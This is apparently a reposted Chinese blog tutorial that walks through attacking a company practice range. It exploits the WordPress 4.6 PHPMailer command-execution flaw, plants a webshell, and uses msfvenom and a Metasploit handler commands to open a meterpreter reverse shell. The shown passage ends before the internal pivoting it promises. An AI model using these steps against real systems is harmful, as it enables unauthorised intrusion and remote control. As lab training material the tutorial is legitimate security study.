文章插图
在平时护网比赛中,攻坚环境中,渗透测试中,做内网穿透使用的工具有很多如:EW、Cobalt Strike 为了方便小白入门,本次教程通过渗透过程中最常用的MSF攻击框架中socks4做内网穿透代理,实现内网横向渗透 。
用本公司的靶场,模拟一个攻坚小场景:
外网IP:112.115.*.* (一台存在wordPress/ target=_blank class=infotextkey>WordPress漏洞的web服务器)
内网:10.0.0.0/24 (模拟开发人员,一台为weblogic漏洞机器,一台为thinkphp漏洞机器)
渗透思路:用MSF对wordpress漏洞进行反弹shell,发现机器位于一个内网,建立socks4线路,横向扫描并对内网其他机器进行渗透并反弹shell
由于socks4做穿透超过3层就会失去流量速度,所以后期我会写一篇用EW或其他穿透工具做多网段多层穿透 。
攻击机:kali
目标机:攻坚靶场
首先开启kali,利用Wordpress 4.6 任意命令执行漏洞,对主站服务器进行上传一句话或,直接反弹shell(为了一些教会小白一些提权细节,所以先写入一句话,然后在反弹msf shell)如果自己练习,可以直接msf生成shellcode扔到主站反弹shell 。
0x001 主站渗透
打开主站http://122.115.*.*:8000/介绍一下这个漏洞
文章插图
WordPress <= 4.6命令执行漏洞(PHPMailer)(CVE-2016-10033)WordPress是一种使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站 。也可以把WordPress用作一个内容管理系统(CMS)来使用 。WordPress使用PHPMailer组件向用户发送邮件 。PHPMailer(版本<5.2.18)存在远程命令执行漏洞,攻击者只需轻松地构造出一个恶意邮箱地址,即可写入任意文件,从而造成远程命令执行的危害 。POC
假如目标地址为:http : //127.0.0.1 : 8000/
- 把下面的HTTP报文复制到BurpSuite Repeater中,单击Go按钮,填充目标IP和扩展(例如,IP填充127.0.0.1填充80)
- 访问:http : //127.0.0.1 :8000/ vuln
可在发包之前访问该地址,会出现404注意:
- 远程URL中不要有 http://
- 所有字母必须小写
- 所有/用${substr{0}{1}{$spool_directory}}代替
- 空格所有用${substr{10}{1}{$tod_log}}代替
文章插图
文章插图
然后写入一句话
文章插图
用中国蚁剑连接webshell,下一步准备msf生成一个shell
文章插图
文章插图
在linux系统下/var/tmp目录可以进行高权限反弹shell,打开新的一个终端输入"msfconsole"启动msf
文章插图
新打开一个终端生成反弹shell命令
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
文章插图
回到msf端口msf>use exploit/multi/handler ###监听msf>set payload linux/x86/meterpreter/reverse_tcp ###反弹shell模块msf>run ###开始监听
文章插图
用webshell把生成的shell.elf上传到/var/tmp/目录下,chmod+x 提权(linux提权细节),在通过终端执行反弹shell
推荐阅读
- 什么是以太网和以太网交换机?
- 使用 Golang 构建整洁架构
- 夏天防晒衣什么颜色好 ohsunny防晒衣颜色怎么选
- 全罩杯怎么区分 全罩杯半罩杯哪个好
- 杨梅汁怎么做 杨梅汁怎么洗得掉鞋子
- 10月10日精神病宣传日 2021世界精神卫生日是几月几日
- 哪个牌子的奶酪棒最正宗 李易峰求的奶酪面包是什么牌子
- linux命令监测网址是否正常访问
- 衣服有静电怎么去除 衣服粘毛是因为静电吗
- CSS 基础选择器